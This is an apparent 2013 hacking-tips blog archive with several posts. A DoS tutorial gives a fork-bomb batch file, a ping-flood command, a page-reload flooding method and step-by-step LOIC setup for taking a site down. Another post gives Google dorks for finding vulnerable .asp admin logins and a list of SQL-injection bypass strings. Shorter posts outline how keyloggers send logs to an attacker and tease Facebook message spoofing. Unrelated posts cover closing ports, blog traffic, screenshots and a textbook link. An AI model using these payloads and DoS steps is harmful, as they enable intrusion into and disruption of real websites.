Saturday, 28 September 2013

0

ALL OF DOS Attacks

Recent events that have gone on in my favorite website(darksunlight.com) have inspired me to inform people of the dangers of DDoS.
Like the art of hacking by "Social Engineering", their is no anti-virus for DDoS. The only cure is knowledge. Informing the people is the only way to keep it from happening to them. Or a nice firewall^^

I know their are a lot more ways to DoS than are shown here, but i'll let you figure them out yourself. If you find any mistake in this tutorial please tell me^^

What is "DDoS"?

Denial of Service attacks (or Distributed Denial of Service attacks[DDoS]) are a form of organized attacks with the goal of taking down a server by overloading it. Often by sending useless information(packets) to a server in massive amounts.

In-fact about a year ago I found one of my websites was accidentally DoS-ing darksunlight.com(I use darksunlight as my webhost) because my PHP script made an infinite loop that sent the same information over and over and over into darksunlight's SQL databases. This one page took this EXTREMELY powerful server down twice in less than a minute. That site has since been deleted.
That story demonstrates that it does not take more than a simple "error" in your code to overload a server.

Keep in mind that altough spreading knowledge is my main goal, performing DDoS attacks is indeed a federal crime in the US.
It is also an international offence and will be punished according to the local laws of the individual's country.

But enough talk. I will now show you a quick example of a DoS attack of sorts you can do on your local computer.

Sample
Keep in mind that this is NOT a real DoS attack, but rather an example to visualize how a DoS attack works.

We will take down YOUR computer.

Step 1
Open up notepad, mousepad, or your favored equivalent.
Step 2
Type in this simple batch command
Code:
:a
start
goto a
Step 3
Save as "dossample.bat" making sure you select "All files" from the "File Type" dialog.
Step 4
Run that sucker, but save your work first, as this will crash even the best computers in a matter of minutes.

What did you learn from this?
Observe how the file rapidly replicates itself, opening a new CMD right after it opens another.
An infinite loop has been created that has filled the RAM with useless and massive amounts of CMDs(or Terminals for you Unix folk)

DDoS attacks work much the same way, except instead of replicating an infinite number of CMDs, they send information(packets) to the server over and over and over again until the server crashes.

What information you may ask?
Anything. Your login name, your 'online' status, a new comment, the number of views on a video, your new high score. Absolutely any information that could be resent a massive amount of times to the same server.

Next we will be discussing the simplest form of DDoS.

DDoS by Ping Flood

Please note that I will be pinging my Localhost. You should too.

Perhaps one of the simplest ways to DoS is by using the 'ping' command built into most operating systems, including all windows and Linux distributions.

Step 1
Start up your server. Mine is apache, but that is beside the point, the server type does not matter. If it has an IP address, it can be pinged.
Step 2
Type in the ping command
Code:
ping -t -a -l 65500 localhost
Step 3
Press enter and watch it ping the localhost over and over until[/b]
your server crashes, or you get tired of waiting for it to crash.

Since most modern servers can take the stress of the ping flood, you will need to get all your friends to help you ping to bring your server down. Or even slow it down.

Command Explained
ping - tells the computer to ping a server
-t - It will continue to ping the server until the command is closed, or stopped.
-a - Resolves the adress to host names.
-l - Size.

By default the ping will send 32bytes of data to the server, so you must change this to a bigger number. The maximum is 65,500bytes, so that is what we used.

If you send a server any number higher than 65,500bytes it will instantly crash. This is called "Ping of Death".
Like any other thing with the suffix "of Death" it is very rare, and hard to accomplish indeed.

DDoS by Reloading
Something as simple as reloading a page can take down a server if done enough times.

Step 1
Make a page that lets you submit forms. Method='GET' is better than method='POST' for this, but both will work.
(If you do not understand step 1, just find a page that lets you submit information, like a new comment or upload a picture)
Step 2
Fill out the forms and submit
Step 3
Reload the page
If the page uses the POST method your browser will display a dialog asking if you are sure you want to resend the information, or something to that effect. Simply click "Continue" or "OK".(see now why GET is better?)
Step 4
Keep reloading until server is down.

Their are many addons and tools that allow you to autoreload a page. It is a matter of googleing for them. They are widely available and free.

I have just created a program that allows you to Auto-refresh a page using IE. If you are interested please download from:
Host: Filehost.ws | Size: 9kb | Format: .zip ultra compressed | Platform: Windows

This method is very primitive as you can see, but it is probably the best way to DDoS.

Low-Orbit Ion Cannon
LOIC (Low Orbit Ion Cannon) is an app, written in C# and developed by praetox, that was used by Anonymous during Project Chanology. It attempts to DoS the target site by using all its bandwidth, sending TCP, UDP, or HTTP requests to the server until it crashes.

Step 1
Download and extract LOIC
Step 2
Open LOIC.exe and fill out the required information.

[Image: loiic.jpg]

Instructions for filling out:
IP or URL = IP or URL that you wish to DoS
TCP / UDP message = information being sent, just write something random. Or leave it as default.
Port = Server's port
Method = Server's Method, leave as TCP if unknown
If you are gonna try to take down a website then use HTTP
Speed = set to "<= faster"
Threads = How many users it should simulate, the higher the number the faster it will crash. Set to 10,000. Note that this might make your computer lag, if so, set to a lower amount.
Step 3
Click on "IMMA CHARGIN MAH LAZER"
This starts your the program.

Warning: This tool might not seem like much, but many people of all ages have been arrested and convicted for knowingly using this tool. Remember DoS and DDoS are federal crimes, however insignificant it may seem. Use at your own discretion.

Conclusion
Now you know what a DDoS attack is and you can work to better protect your self.

Their are still many other ways to attack a server, but these are the basics of DoS/DDoS.
Protect your servers xD
Glad

0 comments:

0

How to Close Ports

So i've been looking for a while on just how to close a port on a computer. I simply
couldn't find a way. Well, i finally found it. This'll only work for windows users (unless
your unix version OS has netsh).
it's actually quite simple. here's the command for it:

netsh firewall delete portopening TCP portnumber
it's that simple. Simply go to START -> RUN -> and type in that command up there,
and it'll close it for you.

or, you can also open up command prompt (START -> RUN -> CMD) and type in "netsh"
without the quotes to get to your windows firewall settings.
however, since i'm such a nice guy, i wrote it all out in a vbs script for you so that it's
automatically runable. as well as a batch script. so here you are follows:
=============================
.VBS Script
set ss = createobject("wscript.shell")
set ws = wscript
dim PORT
PORT = InputBox("Enter the port you wish to close:")
ss.run "netsh.exe"
ws.sleep 1000
ss.sendkeys "firewall delete portopening TCP " & PORT
ss.sendkeys "{enter}"
ws.sleep 500
'ss.sendkeys "exit"
'ss.sendkeys "{enter}"
================================
.BAT Script
@echo off
title Port Closer
echo Port Closer>
echo.
set /p port=Type the port number you wish to close here:
netsh firewall delete portopening TCP %port%
msg /w * Port %port% has been closed.
exit

0 comments:

0

How a Key Logger Works-------


How A Keylogger Works:


As most of you are now familiar with a
Trojan, KeyLogger is the simplest of the
different kind of Trojans.

As the name indicates,
the sole purpose ofthe keylogger is to log all
the key strikes a user is making and send that
logs to the master periodically.

Usually, a keylogger consists of two files, one
DLL (Dynamic Linking Library) and a .EXE
(Executable) file.

The purpose of the DLL file is
to work in sync with the OS I/O and records/
logs the keystrokes the user is making.

The Exe file is responsible for starting the DLL file to
work. There are mainly two different ways to send the
logs back to its Master.

First, It can email the
logs to the masters email account and he then
can get the logs when he opens his emails.

The second method is to upload the logs to a
remote FTP server which will be then entered by
the Master to retrieve the log files.

Congratulations, now you're a little smarter.

0 comments:

Friday, 27 September 2013

0

TOP six ways to increase traffic to your site

Bloggers are now a days working on to get more and bring more visitors to their website. Getting more visitors and readers is the key to success. But if you really want to bring more visitors to your website then you surely need to apply good methods. Today in this blog post I will provide you some of my tips that I use to bring more visitors to my website and I hope that it will also help you to get more visitors to your website.
Top 6 Tips to Bring More Visitors to Your Website!

Post on Regular Basis

Posting on regular basis is really necessary for every Bloggers because if you don’t post on regular basis then you will lose your loyal visitors that already like your site. Make sure that the article should be quality because people do not like low-quality and spam articles.
You can ask this question to yourself that do you like low-quality, spam articles. You would surely say No so think how the other people would like low-quality and spam posts? so consider posting quality article and your keywords should be sprinkled in your article/post.

Submit your Blog to Search Engines

Usually Search-engines automatically crawl your articles if it is high-quality but you should also try to submit your blog to search engines like Google, Bing, and Ask etc. Search engines like Google have already simplified the way of submitting your content. Google Webmaster Tools makes it easy for every webmaster to get their website crawled faster.

Promote to Social Media Sites

Consider promoting your website to sites like Facebook, MySpace, and Twitter etc. Lots of people use these social media sites to get connected you can get that advantage by promoting your website to these sites.
In an every social media site there is a feature to share the world about your business. In Facebook you can create your page and promote it, more the people like, more you get visitors to your website. Now a days getting likes in Facebook is really easy because lots of users at the time use these social media sites even your friends. That’s the best method used to bring more visitors..

Increase Backlinks to Your Site

Top 6 Tips to Bring More Visitors to Your Website!
Increase the number of backlinks. Backlinks can improve your Page Rank (PR). Try to get more and more backlinks. You can get backlinks by blog commenting, guest posting and many other ways. You can search on the Internet to increase backlinks to your website. More Backlinks = Improved Page Rank.

Video Marketing

Now a day’s Video marketing is really becoming successful method to increase visitors. Let’s say do you use YouTube? Answer of the most of you will be yes. Market your posts on YouTube and results will be better.
Video marketing is now a days becoming a good way to get visitors because people seems to like videos rather than text.
What you can do is make a step by step guide of your post, in the description add your website link and upload it to popular video sites like YouTube, Daily Motion, and MetaCafe etc. You can promote that video to your website, Facebook page and wherever you like and you will surely get 3x more visitors.

Yahoo! Answers

This is one of the method that is not really popular but trust me your traffic will boost using Yahoo! Answers. Yahoo! Answers is a community where people ask questions and other people if they know the answer can answer to them.
In Yahoo! Answers you can answer to the question and leave your link with it because if your answer is selected as best people would surely click on that link.
Yahoo! Answer have good ranking in SERP (Search Engine Results Page). Yahoo Answers do not provide backlinks because the links are no-follow meaning that when Search engine will crawl the page they will not crawl that link. But instead of getting backlinks you can get more traffic.
Yahoo! Answers are strict with their rules so if you are spamming then your account may get blocked.

Conclusion

These tips are really useful for every Blogger. Not just it increases your visitors but also it improves your Page Rank and Alexa Rank.
If you follow the methods above correctly then I am sure that you will bring more visitors to your website.
Please tell us your views and what methods do you use to bring more visitors to your blog.


0 comments:

Thursday, 26 September 2013

0

Trick to login to Facebook by typing your password into the e-mail field and typing your e-mail in the password field !!



When you rightclick and inspect element on the email field,
you'll see this
Email or Phone

<br></br>
<input class="input" type="text" value="" name="email" autocapitalize="off" autocorrect="off"></input>

And on password you'll see this
Password

<br></br>
<input class="input" type="password" name="pass" autocapitalize="off" autocorrect="off"></input>

So what you have to do is,
just type the opposite of each other.
You must have this now:
Email or Phone

<br></br>
<input class="input" type="password" value="" name="pass" autocapitalize="off" autocorrect="off"></input>

And for password this:
Password

<br></br>
<input class="input" type="text" name="email" autocapitalize="off" autocorrect="off"></input>

Done!
Now type your password into the e-mail field and
type your e-mail in the password field and click login
That's all

0 comments:

0

FACEBOOK MESSAGE SPOOFING TRICK

Facebook Message Spoofing Trick. (Send Anonymous Message)

Hey friends today i found one amazing trick and thought to share it with you all, Okay! but the problem is this trick works only sometimes. I mean it depends upon user security and some other contents. well It works everytime but unfortunately sometimes it goes into SPAM message - Just depend upon users security, networking, port etc. I'm gonna show you an awesome tutorial on Facebook Message Spoofing trick, and Send message to anyone from anyone's ID.

What is Message Spoofing ?
In Simple words message Spoofing is a Fake E-mail or Messaging service, that is created by an attacker to send fake E-mails and messages to anyone with any mail server or ID. For Eg. here is three user "Viv, Aafreen and Kevin" Now Kevin will send message to Viv from Aafreen's ID and Viv won't realized that he got a Spoofed message.

0 comments:

0

How to by pass WEBSITE login by sql injection

hai dudes,
today im gonna tell you how to bypass website login by SQL injection
How to Bypass Website Logins by SQL Injection

These are the Dorks Used to Find Vulnerable Site to Bypass LoginWhich are Most Commonly the .asp One.
Search them in Google without Quoutes

“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp

There are More Dorkseven
Now Go to Admin Panel and Type Admin as Username(Common One)
and in Password we Type Our SQLInjection

Here is a list of sql injections.

‘ or ’1'=’1
‘ or ‘x’=’x
‘ or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1'

TYPE ANY ONE OF THESE IN PASSWORD SPACE… There are many more but these are the best ones that i know.

**NOTE not all sites are vulnerable.**

0 comments:

0

GET SCREENSHOT OF PC/LAPTOP

hello friends,
do you know how to get screen shots of pc/laptop?
.......................................
Get snapshots of your PC/Laptop screen without any software.
Here i'll tell you how to make snapshots of any action
on your desktop without any external software
Some people might not know this,
that there is a built-in tool to make snapshots.
On your keyboard search for a button called ''Print Screen SysRq'' or PrtSc SysRq
Just as you want to make a screenshot then just press that button.
And to view/save that picture:
Click on Start search and open ''Paint"
click on edit tab then paste.
Simple is that.
Also if you're playing games!
Like and Share to your friends

0 comments:

Wednesday, 18 September 2013

0

Solutions for RAYMOND CHANG numericals

hai ....
this is the link for solutions for chang book numericals

link:
RAYMOND CHANG solutions

0 comments: